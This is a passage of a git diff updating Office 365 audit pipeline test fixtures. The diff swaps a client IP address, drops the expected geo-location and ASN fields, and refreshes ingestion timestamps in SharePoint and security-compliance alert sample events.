b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sec-comp-alerts-events.json-expected.json @@ -47,7 +47,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:54.428596900Z", + "ingested": "2021-12-09T13:42:45.620853800Z", "original": "{\"AlertEntityId\":\"asr@testsiem.onmicrosoft.com\",\"AlertId\":\"5ba6e029-8b6e-13bd-b800-08d7b180173c\",\"AlertLinks\":[{\"AlertLinkHref\":\"http://example.net/alert\"},{\"AlertLinkHref\":\"http://example.net/info\"}],\"AlertType\":\"System\",\"Category\":\"AccessGovernance\",\"Comments\":\"New alert\",\"CreationTime\":\"2020-02-14T19:00:00\",\"Data\":\"{\\\"etype\\\":\\\"User\\\",\\\"eid\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"tid\\\":\\\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\\\",\\\"ts\\\":\\\"2020-02-14T18:54:45.0000000Z\\\",\\\"te\\\":\\\"2020-02-14T18:54:45.0000000Z\\\",\\\"op\\\":\\\"GrantAdminPermission\\\",\\\"tdc\\\":\\\"1\\\",\\\"suid\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"ut\\\":\\\"Admin\\\",\\\"lon\\\":\\\"GrantAdminPermission\\\"}\",\"EntityType\":\"User\",\"Id\":\"448854d7-81f6-4a06-d31a-08d7b1c1fb2f\",\"Name\":\"Elevation of Exchange admin privilege\",\"ObjectId\":\"asr@testsiem.onmicrosoft.com\",\"Operation\":\"AlertEntityGenerated\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"PolicyId\":\"17d51759-88e1-40c1-8df3-20bcf2e43057\",\"RecordType\":40,\"ResultStatus\":\"Succeeded\",\"Severity\":\"Low\",\"Source\":\"Office 365 Security \\u0026 Compliance\",\"Status\":\"Active\",\"UserId\":\"SecurityComplianceAlerts\",\"UserKey\":\"SecurityComplianceAlerts\",\"UserType\":4,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "SecurityComplianceAlerts", "provider": "SecurityComplianceCenter", @@ -110,7 +110,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:54.428603900Z", + "ingested": "2021-12-09T13:42:45.620863900Z", "original": "{\"AlertId\":\"5ba6e029-8b6e-13bd-b800-08d7b180173c\",\"AlertLinks\":[{\"AlertLinkHref\":\"http://example.net/single\"}],\"AlertType\":\"System\",\"Category\":\"AccessGovernance\",\"Comments\":\"New alert\",\"CreationTime\":\"2020-02-14T19:00:00\",\"Data\":\"{\\\"f3u\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"ts\\\":\\\"2020-02-14T18:45:00.0000000Z\\\",\\\"te\\\":\\\"2020-02-14T19:00:00.0000000Z\\\",\\\"op\\\":\\\"GrantAdminPermission\\\",\\\"wl\\\":\\\"Exchange\\\",\\\"tid\\\":\\\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\\\",\\\"tdc\\\":\\\"1\\\",\\\"reid\\\":\\\"23a5e271-e297-4f35-ff57-08d7b17f5bf2\\\",\\\"rid\\\":\\\"f81f1b69-dc60-4ded-918e-e17d5c73b29f\\\",\\\"cid\\\":\\\"17d51759-88e1-40c1-8df3-20bcf2e43057\\\",\\\"ad\\\":\\\"This alert is triggered when someone in your organization becomes an Exchange admin or gets new Exchange admin permissions -V1.0.0.1\\\",\\\"lon\\\":\\\"GrantAdminPermission\\\",\\\"an\\\":\\\"Elevation of Exchange admin privilege\\\",\\\"sev\\\":\\\"Low\\\"}\",\"Id\":\"7d6297b5-e4a7-46f0-3c1e-08d7b1c1fb22\",\"Name\":\"Elevation of Exchange admin privilege\",\"ObjectId\":\"5ba6e029-8b6e-13bd-b800-08d7b180173c\",\"Operation\":\"AlertTriggered\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"PolicyId\":\"17d51759-88e1-40c1-8df3-20bcf2e43057\",\"RecordType\":40,\"ResultStatus\":\"Succeeded\",\"Severity\":\"Low\",\"Source\":\"Office 365 Security \\u0026 Compliance\",\"Status\":\"Active\",\"UserId\":\"SecurityComplianceAlerts\",\"UserKey\":\"SecurityComplianceAlerts\",\"UserType\":4,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "SecurityComplianceAlerts", "provider": "SecurityComplianceCenter", @@ -172,7 +172,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:54.428606300Z", + "ingested": "2021-12-09T13:42:45.620869900Z", "original": "{\"AlertEntityId\":\"Malware/Evil.Malware.B\",\"AlertId\":\"1233344-8b6e-13bd-b800-08d7b180173c\",\"AlertLinks\":[],\"AlertType\":\"System\",\"Category\":\"ThreatManagement\",\"Comments\":\"This is a phony threat alert\",\"CreationTime\":\"2020-02-14T19:00:00\",\"Data\":\"{\\\"something\\\":\\\"blabla\\\"}\",\"EntityType\":\"MalwareFamily\",\"Id\":\"7d6297b5-e4a7-46f0-3c1e-08d7b1c1fb22\",\"Name\":\"Phony Malware Alert\",\"ObjectId\":\"12345678-8b6e-13bd-b800-08d7b180173c\",\"Operation\":\"AlertTriggered\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"PolicyId\":\"17d51759-88e1-40c1-8df3-20bcf2e43057\",\"RecordType\":40,\"ResultStatus\":\"Succeeded\",\"Severity\":\"High\",\"Source\":\"Office 365 Security \\u0026 Compliance\",\"Status\":\"Active\",\"UserId\":\"SecurityComplianceAlerts\",\"UserKey\":\"SecurityComplianceAlerts\",\"UserType\":4,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "SecurityComplianceAlerts", "provider": "SecurityComplianceCenter", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepoint-events.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepoint-events.json index de2b2b919c2..e2321371e61 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepoint-events.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepoint-events.json @@ -2,10 +2,10 @@ "events": [ { "event": { - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25", "CreationTime": "2020-02-07T16:43:53", "CustomUniqueId": true, @@ -29,10 +29,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25", "CreationTime": "2020-02-07T16:43:53", "CustomUniqueId": true, @@ -56,10 +56,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25", "CreationTime": "2020-02-07T16:43:53", "CustomUniqueId": true, @@ -83,10 +83,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25", "CreationTime": "2020-02-07T16:43:53", "CustomUniqueId": true, diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepoint-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepoint-events.json-expected.json index 2a1fd2d27a5..221a8449059 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepoint-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepoint-events.json-expected.json @@ -2,25 +2,7 @@ "expected": [ { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -55,7 +37,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -67,12 +49,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:54.521149500Z", - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:45.953082200Z", + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePoint", "provider": "OneDrive", "kind": "event", @@ -108,25 +90,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -161,7 +125,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -173,12 +137,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:54.521156700Z", - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:45.953091200Z", + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePoint", "provider": "OneDrive", "kind": "event", @@ -214,25 +178,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -267,7 +213,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -279,12 +225,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:54.521166500Z", - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:45.953097300Z", + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePoint", "provider": "OneDrive", "kind": "event", @@ -320,25 +266,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -373,7 +301,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -385,12 +313,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:54.521170300Z", - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:45.953101800Z", + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 